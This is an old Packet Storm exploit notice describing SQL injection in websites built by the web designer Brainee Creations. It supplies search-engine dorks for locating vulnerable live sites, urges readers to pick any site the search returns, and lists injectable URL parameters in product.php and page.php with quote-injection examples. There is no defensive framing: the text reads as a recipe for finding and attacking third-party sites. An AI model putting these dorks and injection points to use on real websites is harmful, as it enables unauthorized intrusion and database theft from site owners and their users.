Brainee Creations SQL Injection

2011-04-17T00:00:00
ID PACKETSTORM:100520
Type packetstorm
Reporter Xecuti0N3r
Modified 2011-04-17T00:00:00

Description

                                        
                                            `#(+)Exploit Title: Brainee Creations Database Access vulnerability  
#(+)Author : ^Xecuti0n3r  
#(+) Date : 15.04.2011  
#(+) Hour : 13:37 PM  
#(+) E-mail : xecuti0n3r()yahoo.com  
#(+) dork1 : intext:"Site Designed by Brainee Creations" inurl:product.php?  
#(+) dork2 : intext:"Site Designed by Brainee Creations" inurl:page.php?  
#(+) Category : Web Apps [SQli]  
  
____________________________________________________________________  
____________________________________________________________________  
  
Choose any site that comes up when you enter the dork intext:"Site Designed by Brainee Creations" inurl:product.php? in search engine  
  
  
*SQL injection Vulnerability*  
  
  
  
For DOrk1 :  
  
# [+]http://site.com/product.php?pid='08  
# [+]http://site.com/product.php?pid=[SQLi]  
  
# [+]http://site.com/product.php?prod_id='13  
# [+]http://site.com/product.php?prod_id=[SQLi]  
  
# [+]http://site.com/product.php?pid='82  
# [+]http://site.com/product.php?pid=[SQLi]  
  
  
For Dork2 :   
  
# [+]http://site.com/page.php?pid='2  
# [+]http://site.com/page.php?pid=[SQLi]  
  
# [+]http://site.com/page.php?sid='1&pid='6   
# [+]http://site.com/page.php?sid=[SQLi]&pid=[SQLi]  
  
Well there are a lot more .. just use the dork filetype:php ;) ..   
  
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)Exploit Coded by: ^Xecuti0n3r   
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r  
########################################################################  
`